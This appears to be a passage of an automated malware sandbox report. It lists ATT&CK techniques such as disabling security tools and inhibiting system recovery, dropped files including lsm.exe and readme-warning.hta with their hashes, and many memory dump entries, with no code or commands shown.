Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

File Deletion

Impair Defenses

Modify Registry

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\is64.bat

Filesize
181B

MD5
225edee1d46e0a80610db26b275d72fb

SHA1
ce206abf11aaf19278b72f5021cc64b1b427b7e8

SHA256
e1befb57d724c9dc760cf42d7e0609212b22faeb2dc0c3ffe2fbd7134ff69559

SHA512
4f01a2a248a1322cb690b7395b818d2780e46f4884e59f1ab96125d642b6358eea97c7fad6023ef17209b218daa9c88d15ea2b92f124ecb8434c0c7b4a710504

Download Submit
C:\Users\Admin\AppData\Local\Temp\is64.txt

Filesize
3B

MD5
a5ea0ad9260b1550a14cc58d2c39b03d

SHA1
f0aedf295071ed34ab8c6a7692223d22b6a19841

SHA256
f1b2f662800122bed0ff255693df89c4487fbdcf453d3524a42d4ec20c3d9c04

SHA512
7c735c613ece191801114785c1ee26a0485cbf1e8ee2c3b85ba1ad290ef75eec9fede5e1a5dc26d504701f3542e6b6457818f4c1d62448d0db40d5f35c357d74

Download Submit
C:\Users\Admin\AppData\Local\Temp\lsm.exe

Filesize
75KB

MD5
7065c6c8efb58c65cbf97d1139fb3998

SHA1
419e901005e12fbb7f6bbbf59e1802df4db56eb2

SHA256
73b4ab2ae70beb4637920f181ba3f175374209178c86465ca92d333f034ae960

SHA512
1f6883dae0d8f5d6877be5dc30f842bc8d7e1e69cbd45d723c0de3841b30ae042b4962c2b15b1b4c7f0eaf834374a6458d14f385a7934621a104157e91bea1bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\lsm.exe

Filesize
75KB

MD5
7065c6c8efb58c65cbf97d1139fb3998

SHA1
419e901005e12fbb7f6bbbf59e1802df4db56eb2

SHA256
73b4ab2ae70beb4637920f181ba3f175374209178c86465ca92d333f034ae960

SHA512
1f6883dae0d8f5d6877be5dc30f842bc8d7e1e69cbd45d723c0de3841b30ae042b4962c2b15b1b4c7f0eaf834374a6458d14f385a7934621a104157e91bea1bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\readme-warning.hta

Filesize
89KB

MD5
37d55dba7a6114449a2453a5e5357c04

SHA1
34ea79d82409c679e8a5c32f5c469844dd2488d7

SHA256
52003dbfea65f568115dfad09aa0402df57d488ca7f9eb23c7334a51c11deb9f

SHA512
d493512c768e9412047e2ece774a670f636d9b380b63b617f8516eac6ed0de219e0daebc196549fafcd756cab1d44b87dd8cd6ddae712f529295ce9794c0a75e

Download Submit
memory/452-167-0x0000000000000000-mapping.dmp

Download
memory/528-160-0x0000000000000000-mapping.dmp

Download
memory/848-175-0x0000000000000000-mapping.dmp

Download
memory/916-165-0x0000000000000000-mapping.dmp

Download
memory/1272-169-0x0000000000000000-mapping.dmp

Download
memory/1304-138-0x0000000000000000-mapping.dmp

Download
memory/1376-164-0x0000000000000000-mapping.dmp

Download
memory/1388-162-0x0000000000000000-mapping.dmp

Download
memory/1492-170-0x0000000000000000-mapping.dmp

Download
memory/1832-172-0x0000000000000000-mapping.dmp

Download
memory/2148-139-0x0000000000000000-mapping.dmp

Download
memory/2156-136-0x0000000000000000-mapping.dmp

Download
memory/2344-184-0x0000000000000000-mapping.dmp

Download
memory/2440-163-0x0000000000000000-mapping.dmp

Download
memory/3008-177-0x0000000000000000-mapping.dmp

Download
memory/3732-176-0x0000000000000000-mapping.dmp

Download
memory/3792-181-0x0000000000000000-mapping.dmp

Download
memory/3928-173-0x0000000000000000-mapping.dmp

Download
memory/4016-166-0x0000000000000000-mapping.dmp

Download
memory/4284-158-0x0000000000000000-mapping.dmp

Download
memory/4300-159-0x0000000000000000-mapping.dmp

Download
memory/4308-179-0x0000000000000000-mapping.dmp

Download
memory/4348-182-0x0000000000000000-mapping.dmp

Download
memory/4520-171-0x0000000000000000-mapping.dmp

Download
memory/4532-178-0x0000000000000000-mapping.dmp

Download
memory/4572-137-0x0000000000000000-mapping.dmp

Download
memory/4636-154-0x0000000007280000-0x0000000007316000-memory.dmp

Filesize
600KB

Download
memory/4636-144-0x0000000004FA0000-0x00000000055C8000-memory.dmp

Filesize
6.2MB

Download
memory/4636-142-0x0000000000000000-mapping.dmp

Download
memory/4636-157-0x0000000007320000-0x0000000007328000-memory.dmp

Filesize
32KB

Download
memory/4636-156-0x0000000007340000-0x000000000735A000-memory.dmp

Filesize
104KB

Download
memory/4636-155-0x0000000007230000-0x000000000723E000-memory.dmp

Filesize
56KB

Download
memory/4636-143-0x00000000023D0000-0x0000000002406000-memory.dmp

Filesize
216KB

Download
memory/4636-153-0x0000000007070000-0x000000000707A000-memory.dmp

Filesize
40KB

Download
memory/4636-145-0x0000000004D50000-0x0000000004D72000-memory.dmp

Filesize
136KB

Download
memory/4636-152-0x0000000007000000-0x000000000701A000-memory.dmp

Filesize
104KB

Download
memory/4636-151-0x0000000007650000-0x0000000007CCA000-memory.dmp

Filesize
6.5MB

Download
memory/4636-150-0x00000000062B0000-0x00000000062CE000-memory.dmp

Filesize
120KB

Download
memory/4636-149-0x0000000070810000-0x000000007085C000-memory.dmp

Filesize
304KB

Download
memory/4636-148-0x00000000062F0000-0x0000000006322000-memory.dmp

Filesize
200KB

Download
memory/4636-147-0x0000000005D00000-0x0000000005D1E000-memory.dmp

Filesize
120KB

Download
memory/4636-146-0x0000000005640000-0x00000000056A6000-memory.dmp

Filesize
408KB

Download
memory/4732-161-0x0000000000000000-mapping.dmp

Download
memory/4840-183-0x0000000000000000-mapping.dmp

Download
memory/4932-180-0x0000000000000000-mapping.dmp

Download
memory/4948-141-0x0000000000000000-mapping.dmp

Download
memory/5000-168-0x0000000000000000-mapping.dmp

Download
memory/5040-140-0x0000000000000000-mapping.dmp

Download
memory/5040-174-0x0000000000000000-mapping.dmp

Download
memory/5104-134-0x0000000004C50000-0x0000000004CB6000-memory.dmp

Filesize
408KB

Download
memory/5104-133-0x0000000004A00000-0x0000000004A9C000-memory.dmp

Filesize
624KB

Download
memory/5104-135-0x00000000055F0000-0x0000000005B94000-memory.dmp

Filesize
5.6MB

Download
memory/5104-132-0x0000000000100000-0x000000000015A000-memory.dmp

Filesize
360KB

Download
memory/5152-185-0x0000000000000000-mapping.dmp

Download
memory/5184-186-0x0000000000000000-mapping.dmp

Download
memory/5196-187-0x0000000000000000-mapping.dmp

Download
memory/5220-188-0x0000000000000000-mapping.dmp

Download
memory/5252-189-0x0000000000000000-mapping.dmp

Download
memory/5332-190-0x0000000000000000-mapping.dmp

Download
memory/5364-191-0x0000000000000000-mapping.dmp

Download
memory/5396-192-0x0000000000000000-mapping.dmp

Download
memory/5428-193-0x0000000000000000-mapping.dmp

Download
memory/5448-194-0x0000000000000000-mapping.dmp

Download
memory/5460-195-0x0000000000000000-mapping.dmp

Download
memory/5472-196-0x0000000000000000-mapping.dmp

Download
memory/5516-197-0x0000000000000000-mapping.dmp

Download
memory/5576-198-0x0000000000000000-mapping.dmp

Download
memory/5632-199-0x0000000000000000-mapping.dmp

Download
memory/5660-200-0x0000000000000000-mapping.dmp

Download
memory/5692-201-0x0000000000000000-mapping.dmp

Download
memory/5724-202-0x0000000000000000-mapping.dmp

Download
memory/5736-203-0x0000000000000000-mapping.dmp

Download
memory/5748-204-0x0000000000000000-mapping.dmp

Download
memory/5792-205-0x0000000000000000-mapping.dmp

Download
memory/5836-206-0x0000000000000000-mapping.dmp

Download
memory/5860-207-0x0000000000000000-mapping.dmp

Download
memory/5896-208-0x0000000000000000-mapping.dmp

Download
memory/5928-209-0x0000000000000000-mapping.dmp

Download
memory/5960-210-0x0000000000000000-mapping.dmp

Download
memory/6000-211-0x0000000000000000-mapping.dmp

Download
memory/6036-212-0x0000000000000000-mapping.dmp

Download
memory/6092-213-0x0000000000000000-mapping.dmp

Download
memory/6108-214-0x0000000000000000-mapping.dmp

Download